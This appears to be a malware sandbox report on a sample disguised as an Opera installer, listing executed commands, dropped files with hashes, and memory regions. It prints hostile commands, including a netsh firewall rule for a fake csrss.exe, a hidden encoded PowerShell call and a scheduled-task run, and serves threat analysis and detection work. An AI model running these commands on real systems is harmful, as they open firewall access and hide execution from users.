C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "goylhAwiC"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

Network


Files


\Users\Admin\AppData\Local\Temp\Opera_installer_2310070055470022108.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/2108-211-0x00000000012D0000-0x000000000181D000-memory.dmp

memory/3656-212-0x00000000024B0000-0x00000000025B0000-memory.dmp

memory/3228-224-0x00000000012D0000-0x000000000181D000-memory.dmp

memory/5008-228-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4272-230-0x0000000000400000-0x000000000064D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-Q1HIR.tmp\c0is4o4zfXbtR2aLKnJyUN55.tmp

MD5 ebec033f87337532b23d9398f649eec9
SHA1 c4335168ec2f70621f11f614fe24ccd16d15c9fb
SHA256 82fdd2282cf61cfa6155c51a82c4db79487ffeb377d0245d513edeb44d731c16
SHA512 3875c2dd9bbeb5be00c2ccf8391bcb92d328a3294ce5c2d31fd09f20d80e12bd610d5473dfc2e13962578e4bb75336615cdf16251489a31ecbe4873d09cf1b11

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 66405f56f6d73a541c6f9983355367cb
SHA1 3dc44aa183d6b2a6bdfe3d0f43a571091e315c9f
SHA256 c262f62ebf00cb65b66ed34c08abe60bfb8eb2a123a8c5459df4f40eb41934d8
SHA512 dbf8c0acfa411799c24f88474f2a86247e847cde678868a2f9991554d541ac6a230f5e51269ad3fd35492abf1e7928beae0b21ae6b3b740a5086bdfcb7a22f99

memory/5116-243-0x0000000004240000-0x0000000004644000-memory.dmp

memory/4068-246-0x0000000004760000-0x000000000504B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSE177.tmp\Install.exe

MD5 4161dc37f51a8abe388ba9020848dd68
SHA1 c0df7765e93ba705aba079209e9a68a098a5e88a
SHA256 0fc7001b509e266c237dd3c1b00d93b0fdb5919bde5d6e180eaee00ac0cbb30b
SHA512 e82cc3163cf52390115477fd1c12277915dc92413a7677a74f9c469571b7e2af9cd8b9064c021b7ec0007de40e557fecc2d57e1858ffd09f9419e7bb64cb004c

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 66405f56f6d73a541c6f9983355367cb
SHA1 3dc44aa183d6b2a6bdfe3d0f43a571091e315c9f
SHA256 c262f62ebf00cb65b66ed34c08abe60bfb8eb2a123a8c5459df4f40eb41934d8
SHA512 dbf8c0acfa411799c24f88474f2a86247e847cde678868a2f9991554d541ac6a230f5e51269ad3fd35492abf1e7928beae0b21ae6b3b740a5086bdfcb7a22f99

memory/1744-247-0x0000000010000000-0x0000000010571000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 cd9e384c76b7ecc6818ea5f7e63c14e0
SHA1 e0bf6c462b879bc93e94e2ae1444be0d8cdf3550
SHA256 5329b643c7617d446ed580289bb5a0386b3b0b97cf970d8c34b36d231ef45a7d
SHA512 02ec8a723c4a710dd70dc343838996a318ba0ac87069a3ad530e9b9312c3ed395dd5cf36247422376fd48b97f7ac314cf02f9dfe9fd4b655c4f9ca47f889f270

memory/4516-253-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/4544-254-0x0000000073950000-0x000000007403E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 1bfe591a4fe3d91b03cdf26eaacd8f89
SHA1 719c37c320f518ac168c86723724891950911cea
SHA256 9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8
SHA512 02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

memory/4068-260-0x0000000000400000-0x0000000002670000-memory.dmp

memory/1744-267-0x0000000000150000-0x0000000000825000-memory.dmp

memory/5112-252-0x0000000000400000-0x0000000000413000-memory.dmp

memory/5116-268-0x0000000000400000-0x0000000002670000-memory.dmp

memory/5116-251-0x0000000000400000-0x0000000002670000-memory.dmp

memory/4068-235-0x0000000004360000-0x000000000475F000-memory.dmp

memory/3988-231-0x00000000012D0000-0x000000000181D000-memory.dmp

memory/5084-278-0x00007FF682BC0000-0x00007FF683103000-memory.dmp

C:\Program Files (x86)\OSNMount\OSNMount.exe

MD5 016e672371a4716f6f7b5f14a0d22006
SHA1 5a1a731ec902a26a4f0bb7774e1c25451b9a0f01
SHA256 1328eb253044694b17d4343f4eb000c95a7bfb0c478bc315eec842e7f7a2d8bc
SHA512 7dfceeb44a7d2a7e6c918bffd4c902241ecd4a8f70c81ad0d2fe31a91f05161c25229aafef40c153e13910b0ee4c9214126bd673472bac07ffb2e29668df5110

\Users\Admin\AppData\Local\Temp\Opera_installer_2310070055479703228.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\Pictures\AqX1vDOyZ5AE2GpB6E1KGAyf.exe

MD5 ddaf5b09a3ac1f85960b3b767c831892
SHA1 02f81e5fe283c783dfe61dff72fb3d870835a481
SHA256 bccf0ad64a32d308393d0845df585777f1383775886f18666a5d5ae9f32da97d
SHA512 a6927345e7b2166e9f02ebe28ad175dbde8d6f55b85cd1064cec7a7e01ab3391725b08ccb1f8c2aa83a76540fbd1c1e4ffa5fdb04a746bbb5ff7115590d3147d

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe

MD5 b197232556dd9ade88d4d406b06fc7a7
SHA1 e31375fbdc786f2375f235f9914444731bb3a14d
SHA256 c983cf56221b8e1a61a7a58911ec007643bcb0de353b32d2b820097f8a7e65bd
SHA512 5dd2ee5e28074f97904b369936450e435f37bdb60bcf68982d33d4ade562c3196b032406172ea30aecf9f8dcb217d8b773a775e10d6a023f931ff2c4840567a6

memory/3656-215-0x00000000022B0000-0x00000000022B9000-memory.dmp

memory/5008-214-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4176-186-0x0000000004DB0000-0x0000000004DC0000-memory.dmp

memory/3964-185-0x0000000000160000-0x00000000006AD000-memory.dmp

memory/3400-178-0x00000000001F0000-0x00000000001F1000-memory.dmp

memory/2840-175-0x00000000008A0000-0x00000000008A1000-memory.dmp

memory/4272-287-0x0000000000400000-0x000000000064D000-memory.dmp

C:\Program Files (x86)\OSNMount\OSNMount.exe

MD5 016e672371a4716f6f7b5f14a0d22006
SHA1 5a1a731ec902a26a4f0bb7774e1c25451b9a0f01
SHA256 1328eb253044694b17d4343f4eb000c95a7bfb0c478bc315eec842e7f7a2d8bc
SHA512 7dfceeb44a7d2a7e6c918bffd4c902241ecd4a8f70c81ad0d2fe31a91f05161c25229aafef40c153e13910b0ee4c9214126bd673472bac07ffb2e29668df5110

memory/2840-292-0x0000000000400000-0x000000000071C000-memory.dmp

memory/5008-297-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3232-296-0x0000000001130000-0x0000000001146000-memory.dmp

memory/4272-295-0x0000000000400000-0x000000000064D000-memory.dmp

memory/3400-291-0x0000000000400000-0x00000000004B2000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-3H66U.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\xf08sdlOA2OHz3IrTpI6lnjC.exe

MD5 b197232556dd9ade88d4d406b06fc7a7
SHA1 e31375fbdc786f2375f235f9914444731bb3a14d
SHA256 c983cf56221b8e1a61a7a58911ec007643bcb0de353b32d2b820097f8a7e65bd
SHA512 5dd2ee5e28074f97904b369936450e435f37bdb60bcf68982d33d4ade562c3196b032406172ea30aecf9f8dcb217d8b773a775e10d6a023f931ff2c4840567a6

memory/4176-162-0x0000000073950000-0x000000007403E000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_2310070055435024140.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\AppData\Local\Temp\is-Q1HIR.tmp\c0is4o4zfXbtR2aLKnJyUN55.tmp

MD5 ebec033f87337532b23d9398f649eec9
SHA1 c4335168ec2f70621f11f614fe24ccd16d15c9fb
SHA256 82fdd2282cf61cfa6155c51a82c4db79487ffeb377d0245d513edeb44d731c16
SHA512 3875c2dd9bbeb5be00c2ccf8391bcb92d328a3294ce5c2d31fd09f20d80e12bd610d5473dfc2e13962578e4bb75336615cdf16251489a31ecbe4873d09cf1b11

memory/4544-142-0x0000000005790000-0x0000000005952000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-1VM64.tmp\is-0V4KQ.tmp

MD5 f1b5055e1e80bf52a48683f85f9298ef
SHA1 26976cc0c690693084466d185c5e84da9870a778
SHA256 0b6381a1fc1ebc6594804042c8bf1ccfac7a9328bba3d3a487e571cbee298e50
SHA512 01290db6ac4dedb15d20fdc80a112b34cbce5c381c8fd262633c662e7927b314bca8063ad6109331d57feb50ed4045c05a7235347bb29edf401f9f867e9237ef

C:\Users\Admin\AppData\Local\Temp\is-1VM64.tmp\is-0V4KQ.tmp

MD5 f1b5055e1e80bf52a48683f85f9298ef
SHA1 26976cc0c690693084466d185c5e84da9870a778
SHA256 0b6381a1fc1ebc6594804042c8bf1ccfac7a9328bba3d3a487e571cbee298e50
SHA512 01290db6ac4dedb15d20fdc80a112b34cbce5c381c8fd262633c662e7927b314bca8063ad6109331d57feb50ed4045c05a7235347bb29edf401f9f867e9237ef

memory/4492-139-0x00007FF7D26F0000-0x00007FF7D27DC000-memory.dmp

C:\Users\Admin\Pictures\Iq5uaZWhDgUZkcNbrHwhNpCq.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

C:\Users\Admin\Pictures\Iq5uaZWhDgUZkcNbrHwhNpCq.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

C:\Program Files (x86)\OSNMount\OSNMount.exe

MD5 016e672371a4716f6f7b5f14a0d22006
SHA1 5a1a731ec902a26a4f0bb7774e1c25451b9a0f01
SHA256 1328eb253044694b17d4343f4eb000c95a7bfb0c478bc315eec842e7f7a2d8bc
SHA512 7dfceeb44a7d2a7e6c918bffd4c902241ecd4a8f70c81ad0d2fe31a91f05161c25229aafef40c153e13910b0ee4c9214126bd673472bac07ffb2e29668df5110

memory/5116-307-0x0000000000400000-0x0000000002670000-memory.dmp

C:\Users\Admin\Pictures\GX7zBMt5qEP7mvHo7sUjQ8oD.exe

MD5 92730c87a11aecf1ad0e3c1553ee5523
SHA1 41cd8717113344fedf8504109df21253f210b0e4
SHA256 8e795f950cd97d1c5bcbdcc176857d84c3bd72061a1d24ac3f5c0e7ce0de740c
SHA512 9272a6ee98f4c0eb630448f11e96dda1ccbbd59e8ef1b40c65fcd7c5c7993f8fb72a90c08a1e7429be6f4b9e938e240a41495a7285cb68b748201a1008ed422c

C:\Users\Admin\Pictures\GX7zBMt5qEP7mvHo7sUjQ8oD.exe

MD5 92730c87a11aecf1ad0e3c1553ee5523
SHA1 41cd8717113344fedf8504109df21253f210b0e4
SHA256 8e795f950cd97d1c5bcbdcc176857d84c3bd72061a1d24ac3f5c0e7ce0de740c
SHA512 9272a6ee98f4c0eb630448f11e96dda1ccbbd59e8ef1b40c65fcd7c5c7993f8fb72a90c08a1e7429be6f4b9e938e240a41495a7285cb68b748201a1008ed422c

memory/4068-313-0x0000000000400000-0x0000000002670000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

memory/5084-325-0x00007FF682BC0000-0x00007FF683103000-memory.dmp

memory/4544-329-0x0000000006A30000-0x0000000006F5C000-memory.dmp

memory/2840-334-0x0000000000400000-0x000000000071C000-memory.dmp

memory/3228-336-0x00000000012D0000-0x000000000181D000-memory.dmp

memory/4544-337-0x0000000007500000-0x000000000750A000-memory.dmp

memory/4492-343-0x0000000002F60000-0x00000000030D1000-memory.dmp

memory/652-339-0x0000000000400000-0x000000000064D000-memory.dmp

memory/812-347-0x00007FFC4FC80000-0x00007FFC4FC82000-memory.dmp

memory/812-348-0x00007FFC4FC90000-0x00007FFC4FC92000-memory.dmp

memory/812-349-0x00007FFC4F350000-0x00007FFC4F352000-memory.dmp

memory/812-350-0x00007FFC4F4C0000-0x00007FFC4F4C2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DigitalPulse\DigitalPulse.lnk

MD5 97bb77c107cd323278a27e0d63d0d0e2
SHA1 d80654c28f91e001fcdf671add9244feb3d79fd2
SHA256 e0543fee16083e456f73b16ec234a7879a94dda6b1f98f5b01720c6eaedb686c
SHA512 5b7b961e912a427eb6f9a12bac3efa6b1e1cdea070c3dfce6d2adaa5e1b253500e4fd14d025c1fe8f789ed670cb4e8328557437a1c6a543511af4aeed6e6c0a2

memory/812-356-0x00007FFC4E530000-0x00007FFC4E532000-memory.dmp

memory/812-353-0x00007FFC4E520000-0x00007FFC4E522000-memory.dmp

memory/812-357-0x00007FF7D91F0000-0x00007FF7DA26B000-memory.dmp

memory/2840-366-0x0000000000400000-0x000000000071C000-memory.dmp

memory/4492-372-0x00000000030E0000-0x0000000003211000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 112711b6f74c56371060d62abd2b53a4
SHA1 dea0fa4c3ebcb8c00f0864f79306ecacf6b5f975
SHA256 ca42ae305396f42db756dac9f7f4792064cc716865447045bde0a7d535474349
SHA512 9eb058f176f023b58866f663498226ce96ec92028e2bc3739ad06f5455409af2b226c49dcc1c65b967f78e5d65c5e19a6f716cf93891c040f24db73bf4c2aa98

memory/812-374-0x00007FF7D91F0000-0x00007FF7DA26B000-memory.dmp

memory/4832-376-0x00007FFC33D10000-0x00007FFC346FC000-memory.dmp

memory/4832-378-0x0000023C1A620000-0x0000023C1A630000-memory.dmp

memory/4832-377-0x0000023C1A620000-0x0000023C1A630000-memory.dmp

memory/812-380-0x00007FF7D91F0000-0x00007FF7DA26B000-memory.dmp

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

MD5 3945df42a2cbe47502705ecde2ff2a87
SHA1 1545a5a72ffaf6c6c8e9df0ca6aa8d2aff5cc5b5
SHA256 c767ecc88396047716862b881480450b517715bfc7bdd12c878cf2d54262f1f8
SHA512 0850ac896ae1d8e766d34746294d212fe071c45e0f740085d37236e0caa05d823ad4ddfeba2baf1bcc71b20612058f08dbafd62fb3deb1a8ed1074d2eae71ead

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

MD5 3945df42a2cbe47502705ecde2ff2a87
SHA1 1545a5a72ffaf6c6c8e9df0ca6aa8d2aff5cc5b5
SHA256 c767ecc88396047716862b881480450b517715bfc7bdd12c878cf2d54262f1f8
SHA512 0850ac896ae1d8e766d34746294d212fe071c45e0f740085d37236e0caa05d823ad4ddfeba2baf1bcc71b20612058f08dbafd62fb3deb1a8ed1074d2eae71ead

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

MD5 3945df42a2cbe47502705ecde2ff2a87
SHA1 1545a5a72ffaf6c6c8e9df0ca6aa8d2aff5cc5b5
SHA256 c767ecc88396047716862b881480450b517715bfc7bdd12c878cf2d54262f1f8
SHA512 0850ac896ae1d8e766d34746294d212fe071c45e0f740085d37236e0caa05d823ad4ddfeba2baf1bcc71b20612058f08dbafd62fb3deb1a8ed1074d2eae71ead

memory/4516-413-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 7534b5b74212cb95b819401235bd116c
SHA1 787ad181b22e161330aab804de4abffbfc0683b0
SHA256 b05c6723077813dc9b48a2f1142db37ea63c672931d13a74d320f7d006756a04
SHA512 ea268788dc59ab78c0aadd4db9bbcf95493bf4eb2b5ae3d592e6876596246832fc574e7bc1348ce7922b32dcedcf71876ff59fb8beace5c06891ec897c9dac51

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 7534b5b74212cb95b819401235bd116c
SHA1 787ad181b22e161330aab804de4abffbfc0683b0
SHA256 b05c6723077813dc9b48a2f1142db37ea63c672931d13a74d320f7d006756a04
SHA512 ea268788dc59ab78c0aadd4db9bbcf95493bf4eb2b5ae3d592e6876596246832fc574e7bc1348ce7922b32dcedcf71876ff59fb8beace5c06891ec897c9dac51

memory/812-435-0x00007FFC4D000000-0x00007FFC4D0AE000-memory.dmp

memory/812-433-0x00007FFC4CDB0000-0x00007FFC4CFF9000-memory.dmp

memory/812-438-0x00007FFC4FAA0000-0x00007FFC4FC7B000-memory.dmp

memory/4832-440-0x0000023C1A620000-0x0000023C1A630000-memory.dmp

memory/4544-441-0x0000000006070000-0x0000000006080000-memory.dmp

memory/812-439-0x00007FFC00030000-0x00007FFC00031000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

memory/812-437-0x00007FFC00000000-0x00007FFC00002000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\Pictures\BGFqRnDmzqygvUEXV8ibxwCU.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\AppData\Local\Temp\7zSE177.tmp\Install.exe

MD5 4161dc37f51a8abe388ba9020848dd68
SHA1 c0df7765e93ba705aba079209e9a68a098a5e88a
SHA256 0fc7001b509e266c237dd3c1b00d93b0fdb5919bde5d6e180eaee00ac0cbb30b
SHA512 e82cc3163cf52390115477fd1c12277915dc92413a7677a74f9c469571b7e2af9cd8b9064c021b7ec0007de40e557fecc2d57e1858ffd09f9419e7bb64cb004c

memory/4832-473-0x0000023C1A620000-0x0000023C1A630000-memory.dmp

memory/4832-480-0x00007FFC33D10000-0x00007FFC346FC000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\opera_package

MD5 1b4af0087d5df808f26f57534a532aa9
SHA1 d32d1fcecbef0e361d41943477a1df25114ce7af
SHA256 22c21ff3d0f5af1c2191318ea12921cfd5434afc32c0641d58fd3f3a218ea111
SHA512 e5a32022fd08464a24c89819703fd9f05c75bd5b47392aae186b96a8e1146fb0c98cda14bfec9a1393c0cdde706db77d32e7a9a86e4611c72103265982d31e07

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\additional_file0.tmp

MD5 b0f128c3579e6921cfff620179fb9864
SHA1 60e19c987a96182206994ffd509d2849fdb427e3
SHA256 1c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee
SHA512 17977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe

MD5 b0f128c3579e6921cfff620179fb9864
SHA1 60e19c987a96182206994ffd509d2849fdb427e3
SHA256 1c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee
SHA512 17977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe

MD5 b0f128c3579e6921cfff620179fb9864
SHA1 60e19c987a96182206994ffd509d2849fdb427e3
SHA256 1c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee
SHA512 17977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\assistant_installer.exe

MD5 34afbc4605531efdbe6f6ce57f567c0a
SHA1 6cb65f3565e40e7d08f5a0ad37b1b9182b4fc81b
SHA256 0441668bc7daf97c16734a8a95eb29de9fd2f4bec368f4d009e5437862249019
SHA512 577fe412d9b20055cf2f67e029a6829301d6b010cc03d2cf8ce89b87c213530dc4d396a27b92f56ed8260afd59d6fbd8cf841e807460f0a0bad4ad1df5b7c25c

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\dbghelp.dll

MD5 861a07bcf2a5cb0dda1aaf6dfcb57b26
SHA1 a0bdbbc398583a7cfdd88624c9ac2da1764e0826
SHA256 7878be3359a3ecfcf94f961bcdce3e6e8bc01a55eba640d45b867b94f30fcdbc
SHA512 062159168817968f1165cb06299217a556c4e6b00ef7c740f845fdcbbaca77da346ef5fd7403c6f9d81e173a2fcf40c63da57cb884158f8c037c0df0ce1cc5b9

\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\dbgcore.dll

MD5 5a6cd2117967ec78e7195b6ee10fc4da
SHA1 72d929eeb50dd58861a1d4cf13902c0b89fadc34
SHA256 a013652c95eca80356040312390d09ed78458fca6a0aef5ce3203dfe9cbc5040
SHA512 07aa64e6c681360c6c6c504041bd97f54dbf0aad8e498281dc8f8bdec2de4fc1c1bed9d0c4d3b6f4a4be19c408f7d34ff1c4a13db36488f698e3ae11855b895c

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\dbgcore.DLL

MD5 5a6cd2117967ec78e7195b6ee10fc4da
SHA1 72d929eeb50dd58861a1d4cf13902c0b89fadc34
SHA256 a013652c95eca80356040312390d09ed78458fca6a0aef5ce3203dfe9cbc5040
SHA512 07aa64e6c681360c6c6c504041bd97f54dbf0aad8e498281dc8f8bdec2de4fc1c1bed9d0c4d3b6f4a4be19c408f7d34ff1c4a13db36488f698e3ae11855b895c

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\assistant_installer.exe

MD5 34afbc4605531efdbe6f6ce57f567c0a
SHA1 6cb65f3565e40e7d08f5a0ad37b1b9182b4fc81b
SHA256 0441668bc7daf97c16734a8a95eb29de9fd2f4bec368f4d009e5437862249019
SHA512 577fe412d9b20055cf2f67e029a6829301d6b010cc03d2cf8ce89b87c213530dc4d396a27b92f56ed8260afd59d6fbd8cf841e807460f0a0bad4ad1df5b7c25c

\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\dbghelp.dll

MD5 861a07bcf2a5cb0dda1aaf6dfcb57b26
SHA1 a0bdbbc398583a7cfdd88624c9ac2da1764e0826
SHA256 7878be3359a3ecfcf94f961bcdce3e6e8bc01a55eba640d45b867b94f30fcdbc
SHA512 062159168817968f1165cb06299217a556c4e6b00ef7c740f845fdcbbaca77da346ef5fd7403c6f9d81e173a2fcf40c63da57cb884158f8c037c0df0ce1cc5b9

C:\Users\Admin\AppData\Roaming\tjdtfju

MD5 ddaf5b09a3ac1f85960b3b767c831892
SHA1 02f81e5fe283c783dfe61dff72fb3d870835a481
SHA256 bccf0ad64a32d308393d0845df585777f1383775886f18666a5d5ae9f32da97d
SHA512 a6927345e7b2166e9f02ebe28ad175dbde8d6f55b85cd1064cec7a7e01ab3391725b08ccb1f8c2aa83a76540fbd1c1e4ffa5fdb04a746bbb5ff7115590d3147d